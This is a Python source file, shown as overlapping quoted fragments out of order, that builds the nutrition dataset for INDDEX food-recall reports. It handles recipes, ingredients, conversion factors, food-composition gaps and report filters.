"[] for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows):",
"in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't",
"self._is_std_recipe_ingredient: # If it's an indicator that hasn't been explicitly set, check if",
"= sum(res.values()) if res else None except TypeError: res[recipe.uuid] = None return res",
"the food fixture or from the parent food case's UCR if indicator.in_food_fixture: return",
"if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid]",
"= self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if",
"if res else None except TypeError: res[recipe.uuid] = None return res def _multiply(*args):",
"rows): \"\"\"These rows aren't part of a recipe, or it wasn't found\"\"\" for",
"self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code:",
"in filter_selections } self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k:",
"I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name',",
"indicator that hasn't been explicitly set, check if it can # be pulled",
"I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE),",
"CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1',",
"if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code:",
"I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name',",
"_INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking',",
"if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM,",
"else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if",
"for them. Components ---------- FoodData :: This is the interface to this dataset,",
"= amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols}",
"I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR),",
"IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags",
"== FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS",
"if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't part of",
"in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code = None if",
"of a recipe, or it wasn't found\"\"\" for raw_row in rows: row =",
"in tags self.is_calculated_later = CALCULATED_LATER in tags # Indicator descriptions can be found",
"= 'calculated_later' class I: def __init__(self, slug, *tags): self.slug = slug tags =",
"and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients:",
"for slug in self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr = FoodCaseData({ 'domain':",
"The ingredients of the recipe are entered as additional food cases and linked",
"IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META),",
"= _multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res = {} for row",
"from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows = [] for row in",
"= self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in food_groups: return False return True",
"in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs =",
"I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR),",
"IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR),",
"= FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield",
"in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code'",
"def _set_composition(self): # Get the food composition corresponding to food_code, fall back to",
"reduce from memoized import memoized from corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list",
"a \"recall\" session. This results in a \"foodrecall\" case. Every food they mention",
"res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res = {} for",
"{ slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr",
"domain, slugs) def _matches_in_memory_filters(self, row): # If a gap type is specified, show",
"if not self.age_months_calculated: return None for age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self,",
"= _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set.",
"self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META",
"_get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return []",
"can # be pulled from the food fixture or from the parent food",
"information, and auditing columns reporting on what data is or isn't available. Some",
"else: # this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self):",
"if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE",
"ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture'",
"with already_reported_recipe_case_id and don't enumerate the ingredients again. We need to insert duplicates",
"aren't part of a recipe, or it wasn't found\"\"\" for raw_row in rows:",
"raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std recipe",
"These rows are associated with the recipe case, but don't have a case",
"self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if",
"if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid filter slug\")",
"IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR),",
"inserted for each ingredient. These rows are associated with the recipe case, but",
"slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS",
"I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender',",
"def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients",
"during a recall session. The ingredients of the recipe are entered as additional",
"import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor",
"= self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used",
"_INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet",
"if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request): return cls( domain,",
"= IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in",
"all the component pieces and presents the result as a unified dataset. FoodRow",
"ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients",
"for row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id",
"self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis",
"_multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res else None except",
"recipe ingredients come from the DB, NOT ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures,",
"= request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't filter",
"a recall session. The ingredients of the recipe are entered as additional food",
"I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR),",
"self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used ==",
"res else: # NON_STANDARD_RECIPE res = {} for row in ingredients: res[row.uuid] =",
"def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if",
"if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self,",
"type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return",
"/ amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if",
"NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients)",
"setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe, master_recipe): #",
"in tags # Indicator descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS =",
"the component pieces and presents the result as a unified dataset. FoodRow ::",
".const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import",
"NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def",
"def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name in",
"are associated with the recipe case, but don't have a case of their",
"come from the DB, NOT ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for",
"slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't",
"= True yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some",
"= self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used =",
"for i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction',",
"{} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid]",
"row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']:",
"sum(res.values()) if res else None except TypeError: res[recipe.uuid] = None return res def",
"filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v in request.GET.getlist(k) if v] for k",
"the recipe by `recipe_case_id`. Beneficiaries may report eating a nonstandard recipe more than",
"'references': [], 'ingredients': [], }) for row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE,",
"**{k: v for k, v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod",
"== NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code",
"food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code",
"ingredients into the report for them. Components ---------- FoodData :: This is the",
"'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def",
"on what data is or isn't available. Some of these foods are recipes,",
"= 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition",
"= ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code",
"not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete =",
"IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER),",
"= ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code",
"ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated: return None for",
"if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if",
"or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't filter by owner if EMWF.show_deactivated_data(slugs):",
"is specified, show only rows with gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type')",
"domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v",
"or it wasn't found\"\"\" for raw_row in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams",
"= recipe.caseid if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type == STANDARD_RECIPE:",
"fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid =",
"presents the result as a unified dataset. FoodRow :: Class responsible for row-wise",
"food composition corresponding to food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists",
"FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types:",
"IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class",
"= self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not",
"in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9',",
"(FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get(",
"no definition for {name}\") class FoodData: \"\"\"Generates the primary dataset for INDDEX reports.",
"# NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe,",
"if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If it's an indicator in",
"not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not",
"from_request(cls, domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for",
"def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction =",
"= [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients =",
"and row.food_type not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and",
"self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self, ingredient): if",
"but don't have a case of their own. Nonstandard recipes are defined by",
"return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v in request.GET.getlist(k)",
"\"\"\" import operator import uuid from collections import defaultdict from functools import reduce",
"of their own. Nonstandard recipes are defined by the user and beneficiary during",
"else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of",
"= recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else:",
"self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self,",
"age_range(self): if not self.age_months_calculated: return None for age_range in AGE_RANGES: if age_range.lower_bound <=",
"group['recipe'] references = group['references'] ingredients = group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references",
"values, insert them from the master recipe nsr_cols = {col: master_recipe[col] for col",
"are defined by the user and beneficiary during a recall session. The ingredients",
"to generate the master dataset for the INDDEX reports Overview -------- Beneficiaries are",
"IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META),",
"I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER),",
"the recall session, calculated nutritional information, and auditing columns reporting on what data",
"in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def",
"raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe]",
"report for them. Components ---------- FoodData :: This is the interface to this",
"@memoized def rows(self): rows = [] for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row)",
"{**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total",
"I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9',",
"This file contains the logic to generate the master dataset for the INDDEX",
"if self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code",
"self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name:",
"isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in",
"IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR),",
"has a row for every food, with metadata about the recall session, calculated",
"None for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions /",
"appear as separate rows in the report. Standard recipes have their ingredients enumerated",
"else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type ==",
"and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug and row.fct_gap_code ==",
"I: def __init__(self, slug, *tags): self.slug = slug tags = set(tags) self.in_ucr =",
"= bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code",
"= None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code",
"class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row",
"try: return reduce(operator.mul, args) except TypeError: return None def _maybe_float(val): return float(val) if",
"their ingredients appear as separate rows in the report. Standard recipes have their",
"self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def",
"_set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction",
"IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR),",
"primary dataset for INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type',",
"raise AssertionError(f\"{slug} is not a valid filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections =",
"= _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows =",
"@property @memoized def rows(self): rows = [] for row in self._get_all_rows(): if self._matches_in_memory_filters(row):",
"None except TypeError: res[recipe.uuid] = None return res def _multiply(*args): try: return reduce(operator.mul,",
"session, calculated nutritional information, and auditing columns reporting on what data is or",
"self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code",
"dataset for the INDDEX reports Overview -------- Beneficiaries are asked about their diet",
"ingredients appear as separate rows in the report. Standard recipes have their ingredients",
"FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections): for slug in filter_selections: if slug",
"I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username',",
"subsequent references point to the recipe definition with already_reported_recipe_case_id and don't enumerate the",
"recipe case, but don't have a case of their own. Nonstandard recipes are",
"return True def _get_grouped_rows(self): \"\"\"Return raw case rows grouped by recipe\"\"\" rows =",
"self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in food_groups: return False return True def",
"= _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes'",
"CALCULATED_LATER = 'calculated_later' class I: def __init__(self, slug, *tags): self.slug = slug tags",
"**nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total =",
"or isn't available. Some of these foods are recipes, and their ingredients appear",
"I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR),",
"self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated: return",
"ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams =",
"more than once, in which case subsequent references point to the recipe definition",
"row.fct_gap_code == FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not",
"== ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return",
"= set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta",
"set. It will be \" \"calculated outside the scope of FoodRow.\") return None",
"report. Standard recipes have their ingredients enumerated in the \"recipes\" lookup table. This",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5',",
"collections import defaultdict from functools import reduce from memoized import memoized from corehq.apps.es",
"rows with gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug",
"raw_row in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap()",
"'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4()",
"set, check if it can # be pulled from the food fixture or",
"I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR,",
"# Indicator descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id',",
"yield from self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield",
"return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return",
"else: # NON_STANDARD_RECIPE res = {} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount,",
